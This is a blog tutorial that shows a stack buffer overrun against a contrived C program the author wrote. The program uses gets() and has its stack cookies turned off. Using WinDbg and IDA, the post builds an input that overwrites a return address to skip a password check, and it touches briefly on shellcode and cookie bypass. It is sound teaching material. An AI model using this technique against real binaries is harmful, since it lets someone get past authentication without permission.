Let's Exploit a Buffer Overrun!

Posted Jan 4, 2024 Updated Feb 29, 2024

By Christopher Akers 21 min read

Well, sort of…

Disclaimer

This is not a particularly ‘clever’ example or one that can be used for genuine nefarious purposes in the year 2023.

The example program we ‘hack’ is small, written by me, and deliberately contrived for success. We compile it using vanilla cl.exe on the command-line with no additional options and we deliberately disable Microsoft’s Safebuffers, something nobody is going to do. Finally, we exploit through a very old C standard library function, a function that was officially replaced in 2011 due to the very vulnerability we’re exploiting.

In all, this example is best described, in British colloquial parlance, as ‘Noddy’. It might have gotten you somewhere in 1987 but not now. Its purpose is to illustrate what a buffer overrun is, exactly, and just one way in which they can leave software open to attack. Plus, it’s fun.

Inspiration for this exercise came from an early chapter of Expert C Programming: Deep C Secrets by Peter van der Linden, a book that was last published in 1994. This should give you some idea of how out of date this example is. Despite its age, though, the book is a great read filled with historic anecdotes and info about the C language. It’s still available from Amazon for Kindle.

Expert C Programming: Deep C Secrets, by Peter van der Linden

Overview

Take the code snippet below.

  
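#include <stdio.h>
#include <string.h>

void print_message(void) {
    char message[14];
    /* 12 characters + newline + terminating NUL = 14 bytes: an exact fit */
    strcpy(message, "Hello World!\n");
    printf("%s", message);
}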

We define an array of char with fourteen elements then fill the array with the message ‘Hello World!’ (twelve characters plus the new-line and room for the terminating NUL character).

The array contents are printed to stdout using printf.

The array is local so it’s stored in the Local Variables section of the stack-frame for print_message(). The diagram below shows a simplified version of the Win64 stack layout.

Windows x64 Stack Layout

The size of the local variables section of a stack-frame is fixed at compile time. The compiler detects the number of local variables in a function, what type they are (and, therefore, what size they are) and emits specific CPU instructions to create and size the stack-frame whenever that function is called. In this example, space for fourteen char elements (14 bytes) will be allocated in the local variables section of the stack-frame for print_message().

Now look at this small modification to the code.

  
void print_message(void) {
    char message[14];
    /* 31 bytes copied into a 14-byte array: strcpy() does no bounds check */
    strcpy(message, "Hello World, how are you all?\n");
    printf("%s", message);
}

It’s the same sized array, but this time we load it with thirty-one elements (including newline and terminating NUL). In C and a lot of lower-level languages there’s nothing stopping you from doing this. There are no runtime checks to ensure you’re only loading up to the maximum number of elements allocated to an array. If you want these checks you have to program them yourself and, it turns out, many developers in the past ..er.. didn’t.

So, where are these additional elements stored? Well, along with the rest of the array in the Local Variable section of the print_message() stack-frame. Except, now, those extra elements have overwritten parts of that section reserved for other local variables. They could even have bled outside the section and overwritten the return address and parts of the calling function’s stack-frame. We’ve overrun our buffer.

Ordinarily, this would result in stack corruption and probably a crash shortly after, but there are a number of, arguably, more worrying vulnerabilities.

For example, it’s possible to add enough elements to our array so that it overwrites the return address with a new return address. That is, when the function finishes execution we can make it branch to code not intended by the original programmer.

… Which is what we’re going to do in this post.

The Vulnerability: gets()

gets() man page

The gets() function (Get String) used to be part of the standard C library. It takes an array of char as a parameter then waits for the user to input a string via stdin to be terminated by newline (pressing enter). The string is stored in the array.

There are no array bounds checks in gets(). You may pass it a char array of twenty but the user could then input ten, fifty, one-thousand characters. It will still write that entire string back to the stack, overwriting anything in the way.

gets() was removed from the C standard library in the 2011 standard (C11). The usual replacement is fgets(), which takes an additional int parameter giving the size of the array, plus the stream to read from. This version does carry out a bounds check and stores at most one fewer character than the size given (leaving room for the terminating NUL), regardless of how many the user enters. By now, I’m sure fgets() has replaced any occurrence of gets() in everybody’s Production code …. right?

Our Target Program

Below is the example program we’re going to use for this demonstration.

  
#include <stdio.h>
#include <stdbool.h>
#include <stdlib.h>  /* exit() */
static __declspec(safebuffers)
bool check_password() {
    char pwd[20];
    printf("Enter your super secret password:");
    gets(pwd);

    // You can never enter the right password in this
    // program ;-)
    return false;
}

int main() {
    // We want to by-pass this check
    if (!check_password()) {
        printf("Oh no! You entered the wrong password!");
        exit(1);
    }

    // Past this point, you're loose in the system
    printf("Logging you on....\n");
    exit(0);
}

A function called check_password() uses gets() to accept a string which will be loaded into an array of chars. A Boolean value is returned causing main() to exit with return code 1 if false, or continue if true.

The thing is check_password() never returns true, always false. It’s impossible to enter the correct password and you will never get past the check … unless you can find some way of jumping over it and into the rest of the program.

Safebuffers

Our target program will run on Windows and we’ll compile it using the MSVC Compiler (cl.exe). By default cl.exe inserts a buffer security check (the /GS option; this post calls it Safebuffers, after the __declspec(safebuffers) attribute that switches it off) to mitigate buffer overrun attacks. A ‘cookie’ value is placed at the top of the Local Variables section of the stack-frame during the function prologue, and then checked during the function epilogue. A change in that value is a strong indication that some variable in the function has written beyond its allocated space, and the program is terminated immediately.

Below is an IDA disassembly of check_password() with Safebuffers enabled. You can see the stack cookie being set-up in the prologue where it’s stored in a local variable (var_10) at the top of the Local Variables section of the stack-frame. It’s generated by xor‘ing a global __security_cookie value with the value in rsp (the stack pointer). The variable is checked just before function epilogue with a call to __security_check_cookie.

Note that __security_check_cookie will actually terminate the program if it finds a problem which is why you don’t see anything checking a return value after the call. If there isn’t an issue everything can just continue.

check_password() disassembly with Safebuffers enabled

Safebuffers can be disabled for specific functions by adding the following line above the function prototype.

  
static __declspec(safebuffers)

You can see this in line 4 of our program listing, above.

Below is an IDA disassembly of check_password() again, but this time with safebuffers disabled. You can see the injected security cookie checks are no longer present.

check_password() disassembly with Safebuffers disabled

For more information, see Microsoft’s documentation: https://learn.microsoft.com/en-us/cpp/cpp/safebuffers?view=msvc-170

Let’s Exploit!

Compile the test program. I do this using the Visual Studio x64 Native Tools Command Line and cl.exe as this removes a lot of the default options that Visual Studio applies when you build through the IDE. We want this to be a vanilla compilation.
Compiling the Test Program
Once compiled, load into the IDA Disassembler. This can be downloaded for free: https://hex-rays.com/ida-free/.
Note down the offset of the main() function in the image. IDA will probably open the file in ‘Graph Mode’, so you will need to right-click and select ‘Text Mode’.
The full disassembly for main() is below and you can see the function image starts at an offset of 0x00000001`40001030 in the executable (the offsets are the numbers on the left).
Finding the location of the main() function in the executable
By default, 64-bit Windows executables are linked with a preferred load address of 0x00000001`40000000 (known as the Image Base), but it can be changed. To confirm, we can scroll to the top of the IDA disassembly and check the global Image Base value.
Finding the global image base value in the executable
Taking the difference between the two, we now know that the main() function is at a 0x1030 byte offset from the global image base in the executable. Remember this number because we’ll use it to locate the function in memory when we run the program.
Start our Target Program executable but stop at the empty password prompt.
Start the program but stop right here
Immediately take a dump of the process from Task Manager but leave it running.
Take a dump of the program but leave it running
Start WinDbg and load the dump taken in the previous step.
Find out where our Target Program’s code-base has been loaded by using the lm command and noting the value in the start column.
 0:000> lm m exploit_buffer_overrun
 Browse full module list
 start             end                 module name
 00007ff7`beb40000 00007ff7`beb69000   exploit_buffer_overrun C (no symbols)
Add the offset found above (0x1030), to the start address. This gives us an address of 00007ff7`beb41030, our expected location of main().

Disassemble using uf to confirm.

 0:000> uf 00007ff7`beb41030
 exploit_buffer_overrun+0x1030:
 00007ff7`beb41030 4883ec28        sub     rsp,28h
 00007ff7`beb41034 e8c7ffffff      call    exploit_buffer_overrun+0x1000 (00007ff7`beb41000)
 00007ff7`beb41039 0fb6c0          movzx   eax,al
 00007ff7`beb4103c 85c0            test    eax,eax
 00007ff7`beb4103e 7516            jne     exploit_buffer_overrun+0x1056 (00007ff7`beb41056)  Branch

 exploit_buffer_overrun+0x1040:
 00007ff7`beb41040 488d0de11f0200  lea     rcx,[exploit_buffer_overrun+0x23028 (00007ff7`beb63028)]
 00007ff7`beb41047 e884000000      call    exploit_buffer_overrun+0x10d0 (00007ff7`beb410d0)
 00007ff7`beb4104c b901000000      mov     ecx,1
 00007ff7`beb41051 e85a690000      call    exploit_buffer_overrun+0x79b0 (00007ff7`beb479b0)

 exploit_buffer_overrun+0x1056:
 00007ff7`beb41056 488d0df31f0200  lea     rcx,[exploit_buffer_overrun+0x23050 (00007ff7`beb63050)]
 00007ff7`beb4105d e86e000000      call    exploit_buffer_overrun+0x10d0 (00007ff7`beb410d0)
 00007ff7`beb41062 33c9            xor     ecx,ecx
 00007ff7`beb41064 e847690000      call    exploit_buffer_overrun+0x79b0 (00007ff7`beb479b0)
 00007ff7`beb41069 33c0            xor     eax,eax
 00007ff7`beb4106b 4883c428        add     rsp,28h
 00007ff7`beb4106f c3              ret

Seems legit. You can compare it with the disassembler output in IDA but the function is very simple and, in this test case, we actually have the source code so can confirm quickly that it’s the right one.

Now, we’re going to take a look at the stack trace.

 0:000> k
  # Child-SP          RetAddr               Call Site
 00 000000c8`298ffbc8 00007ffe`a58a6b2b     ntdll!NtReadFile+0x14
 01 000000c8`298ffbd0 00007ff7`beb53e21     KERNELBASE!ReadFile+0x7b
 02 000000c8`298ffc40 00007ff7`beb53b2a     exploit_buffer_overrun+0x13e21
 03 000000c8`298ffce0 00007ff7`beb51db7     exploit_buffer_overrun+0x13b2a
 04 000000c8`298ffd20 00007ff7`beb475bb     exploit_buffer_overrun+0x11db7
 05 000000c8`298ffd50 00007ff7`beb4101a     exploit_buffer_overrun+0x75bb
 06 000000c8`298ffdb0 00007ff7`beb41039     exploit_buffer_overrun+0x101a
 07 000000c8`298ffe00 00007ff7`beb41318     exploit_buffer_overrun+0x1039
 08 000000c8`298ffe30 00007ffe`a7e2257d     exploit_buffer_overrun+0x1318
 09 000000c8`298ffe70 00007ffe`a84eaa58     kernel32!BaseThreadInitThunk+0x1d
 0a 000000c8`298ffea0 00000000`00000000     ntdll!RtlUserThreadStart+0x28

Note the RetAddr value for stack-frame 0x06: 0x00007ff7`beb41039. It is offset 0x9 bytes from the start of our main() function, according to the location we worked out in the previous step. You can see which instruction this is in the main() disassembly, above. It’s the one just after the first call (line 4 of the listing). It’s a weird looking one, but all it’s doing is zeroing every bit of eax except those in its lowest byte, al (move with zero-extension).

 00007ff7`beb41034 e8c7ffffff      call    exploit_buffer_overrun+0x1000 (00007ff7`beb41000)
 00007ff7`beb41039 0fb6c0          movzx   eax,al

My money is on this call being the call to check_password(). We can confirm by looking in IDA again to get the location of check_password(). According to this call instruction, we should expect it at an offset of 0x1000 from the program’s code-base.

Finding the location of check_password() in the executable

Yep, that seems to be it. This means check_password() should be at address 0x00007ff7`beb40000 + 0x1000 (0x00007ff7`beb41000) in memory. Let’s uf that address in WinDbg.

 0:000> uf 0x00007ff7`beb41000
 exploit_buffer_overrun+0x1000:
 00007ff7`beb41000 4883ec48        sub     rsp,48h
 00007ff7`beb41004 488d0df51f0200  lea     rcx,[exploit_buffer_overrun+0x23000 (00007ff7`beb63000)]
 00007ff7`beb4100b e8c0000000      call    exploit_buffer_overrun+0x10d0 (00007ff7`beb410d0)
 00007ff7`beb41010 488d4c2420      lea     rcx,[rsp+20h]
 00007ff7`beb41015 e882660000      call    exploit_buffer_overrun+0x769c (00007ff7`beb4769c)
 00007ff7`beb4101a 32c0            xor     al,al
 00007ff7`beb4101c 4883c448        add     rsp,48h
 00007ff7`beb41020 c3              ret

Yay, there it is!

Now to find the exact location of our array (pwd) in the stack-frame.
In the check_password() disassembly above there are two call instructions. Looking in IDA, we can see the first is a call to printf which will be the password prompt. The second call is to gets(), the function that reads input and the one we’re trying to exploit. Just above both calls are lea instructions (Load Effective Address) loading the address of something into rcx (rcx is used to pass the first parameter when calling a function, according to the Windows ABI). In the first case, this will be the address of the string ‘Enter your super secret password:’ as the parameter to printf(), and in the second case it will be the address of our array (rsp+20h).
We can replace rsp with the stack-frame base address to find out exactly where this is in the stack-frame.
 0:000> ?000000c8`298ffdb0+20h
 Evaluate expression: 859690761680 = 000000c8`298ffdd0
So, we expect our pwd array to be stored at address 000000c8`298ffdd0.

Now, let’s dump out the entire stack-frame so we can find our array and the return address.

 #  Child-SP          RetAddr               Call Site
 ...
 06 000000c8`298ffdb0 00007ff7`beb41039     exploit_buffer_overrun+0x101a
 07 000000c8`298ffe00 00007ff7`beb41318     exploit_buffer_overrun+0x1039
 ...

Dump out bytes between the two Child-SP locations for stack-frame 06 and 07. I like dumping them 1 byte per column because I find it easier to read. It does generate a long listing, though.

The command is: db /c1 000000c8298ffdb0 (000000c8298ffe00-1)

We subtract 1 from the address of stack-frame 0x7 (main()) because that is actually the base address of stack-frame 0x7 which we don’t need.

Instead of just duplicating the listing from WinDbg, I’ve imported it into Excel and mapped out the different stack-frame sections for easier reading, but if you were to just view it in WinDbg you would see the first three columns.

Stack-frame 06

At the top we have the four eight-byte slots of register parameter home space. According to the Windows ABI, 32 bytes of space must always be reserved for the parameters passed in registers RCX, RDX, R8 and R9 when one function calls another. Note that the space is for parameters passed to a function called from this one, not to this function itself. When a function is called from this one (in our case it will be gets()), it’s the called function that may deposit its register parameters here, just before it modifies the stack-pointer. Also note that this space can be used as scratch storage, too, especially if the code has been compiled as an optimised release. Either way we’re not concerned about this section in this exercise, or what it contains.

There’s no Additional Parameters section in the stack-frame because we only call gets() with one parameter which will be loaded into the RCX register then backed up in the home-space, as described above.

The Local Variables section has space allocated for our array at the exact address we expected from the step above: 000000c8`298ffdd0 and continuing for 20 bytes. There is an additional 20-byte allocation after this which I believe is for alignment purposes. The stack pointer (rsp) must be aligned on a 16-byte boundary, again according to the Windows ABI.

Finally, just outside the stack-frame, we have the 8-byte return address beginning at 0x000000c8`298ffdf8 (the bytes appear in reverse order because x64 stores values little-endian, least-significant byte first). The address is 0x00007ff7`beb41039 which matches the return address in our stack trace, above, and is the address of the instruction in main() just beneath the call, where the result is zero-extended into eax ready for the check. This is the address we want to manipulate.

Let’s look at the disassembly of main() again.

 0:000> uf 00007ff7`beb41030
 exploit_buffer_overrun+0x1030:
 00007ff7`beb41030 4883ec28        sub     rsp,28h
 00007ff7`beb41034 e8c7ffffff      call    exploit_buffer_overrun+0x1000 (00007ff7`beb41000)
 00007ff7`beb41039 0fb6c0          movzx   eax,al
 00007ff7`beb4103c 85c0            test    eax,eax
 00007ff7`beb4103e 7516            jne     exploit_buffer_overrun+0x1056 (00007ff7`beb41056)  Branch

 exploit_buffer_overrun+0x1040:
 00007ff7`beb41040 488d0de11f0200  lea     rcx,[exploit_buffer_overrun+0x23028 (00007ff7`beb63028)]
 00007ff7`beb41047 e884000000      call    exploit_buffer_overrun+0x10d0 (00007ff7`beb410d0)
 00007ff7`beb4104c b901000000      mov     ecx,1
 00007ff7`beb41051 e85a690000      call    exploit_buffer_overrun+0x79b0 (00007ff7`beb479b0)

 exploit_buffer_overrun+0x1056:
 00007ff7`beb41056 488d0df31f0200  lea     rcx,[exploit_buffer_overrun+0x23050 (00007ff7`beb63050)]
 00007ff7`beb4105d e86e000000      call    exploit_buffer_overrun+0x10d0 (00007ff7`beb410d0)
 00007ff7`beb41062 33c9            xor     ecx,ecx
 00007ff7`beb41064 e847690000      call    exploit_buffer_overrun+0x79b0 (00007ff7`beb479b0)
 00007ff7`beb41069 33c0            xor     eax,eax
 00007ff7`beb4106b 4883c428        add     rsp,28h
 00007ff7`beb4106f c3              ret

Lines 5, 6 and 7 are testing the check_password() result and branching if that result is true.

The test instruction (line 6) simply performs a bitwise AND on its operands and sets the CPU zero flag accordingly, discarding the result. In this case, if eax contains 0 (false) then ANDing it with itself gives 0, which sets the zero flag. If it contains 1 (true) then ANDing it with itself gives 1, which leaves the zero flag clear.

JNE (Jump if Not Equal) branches if the zero flag is clear, which here means check_password() returned true. If the zero flag is set, execution just drops to the next instruction at line 10 (0x00007ff7`beb41040), which is the section that prints the error message and exits with code 1.

How can we modify the return address in stack-frame 06 so that it points to the same location as the one jumped to in line 7 (0x00007ff7`beb41056), as if the password check evaluated to true?

We overrun the buffer (or the array).

If we enter twenty characters into the password prompt of our program we fill up the array. If we then entered another 20 we fill up the alignment section of Local Variables (according to the diagram, above). Then all we need to do is enter: 5610b4bef77f0000 and the return address will be replaced.

… Well, not quite.

The string 5610b4bef77f0000 is just that, a string. All that will happen is the ASCII codes for each digit in 5610b4bef77f0000 will be loaded into the stack. What we want is the actual numbers, themselves, not their ASCII codes. To do that we’re going to need to use the Windows Numpad along with the ALT key.

Split the address up into its individual bytes: 56 10 b4 be f7 7f 00 00.
Convert those individual bytes into their decimal representation: 86 16 180 190 247 127 00 00
Now, open Notepad and, using the number-pad only on your keyboard, hold down ALT and enter each number up to the 00’s. After each number, release ALT. You will see whatever symbol Notepad interprets the number as.
The table below formats it out so it’s a bit clearer:
HEX   DEC   Symbol
56    86    V
10    16    ►
b4    180   ┤
be    190   ╛
f7    247   ≈
7f    127   ⌂
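Why don’t we add the 00’s? Fortunately, gets() adds the terminating 00 to our string, so we only need to enter the bytes up to the first 00. That terminator becomes the seventh byte of the address, and the eighth is already 00 because the original return address also begins 0x0000. Entering 00 (effectively, a hard-coded NUL) using the keyboard is actually quite tricky, anyway 😉.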
So the string we have to enter when replacing the return address is: V►┤╛≈⌂ This will insert the correct bytes to make up our new address. Exciting.
Now go back to the command prompt where we started our program and enter the following string (remember, yours will be different, but following the steps above will get you the correct one).
For the ‘special’ characters that represent the new return address it’s best to enter those in Notepad first then paste them into the prompt at the right point. This saves having to do it all again if you make a mistake with the ALT key or the Windows command prompt decides to mess with you!
String to enter: XXXXXXXXXXXXXXXXXXXXZZZZZZZZZZZZZZZZZZZZV►┤╛≈⌂
This maps out to:
Array (20 bytes)        Alignment (20 bytes)    Return Address (6 bytes, minus the 00’s)
XXXXXXXXXXXXXXXXXXXX    ZZZZZZZZZZZZZZZZZZZZ    V►┤╛≈⌂
There’s no particular reason I chose X and Z, they’re just filler characters. You can use whichever ones you want.
Fingers crossed, here we go…
…Did it work?
Logging You On!
Wohoo! We’ve replaced the check_password() function return address which has enabled us to ignore the result of the password check entirely. We’re in! 😱

Conclusion

Once you get away from the abstractions of higher-level languages you get a sense of how everything is just a number to a CPU. It doesn’t understand the context in which you’re using these values, it doesn’t care that you might be behaving badly (or even mistakenly) when asking it to recalculate certain values in registers. It will simply do as it’s told.

In modern computing, compilation is still often seen as the end of the software engineer’s job. A lot of graduates will come out having mastered, say, the latest functional programming paradigm, but have never seen what any of their software looks like when it’s running through a CPU. There’s an assumption that the gate-keeping and rules of modern languages and abstractions mean code is safe if it gets as far as an executable. Anything else would have been caught by a compiler or an interpreter or a linter or even testing.

What actually happens is the gate-keeping is stripped-out altogether, it doesn’t exist at a machine-code level. Even something as basic as a type doesn’t really exist. All you need is a way in and you can start making changes that breach the cosy rules of your favourite programming language. Something as simple as a buffer overrun is one of those ways in.

Attacks can get way more sophisticated than a simple fudging of a return address, too. For instance, in the example above, we actually have 40-bytes to play with in the Local Variable space. Can we load opcode bytes into that local array, effectively writing a small program within the 40 bytes of space available and then set the return address to the top of the array? Why not? As long as there’s a way in.

Even Safebuffers can be circumvented if you know what the security-cookie value is, and you can find that out by dumping the stack-frame and getting its address from the disassembly, as we did above to locate the array. The CPU doesn’t care that those values make up a security cookie, that’s an abstraction implemented by the compiler on top of those values. The CPU will happily change them or write over them if you ask it to.

As I pointed out earlier, the example in this post isn’t a particularly sophisticated hack, especially in 2023, but I had fun going through it to see if I could get it to work. It was surprisingly simple, and I think that’s important. It’s easy to dismiss these kinds of things as something only someone with intimate cyber knowledge and experience can accomplish but, despite the set-up being very contrived, I still managed to do it without any particularly sophisticated knowledge or expensive tools.

All good, clean fun! 😬

This post is licensed under CC BY 4.0 by the author.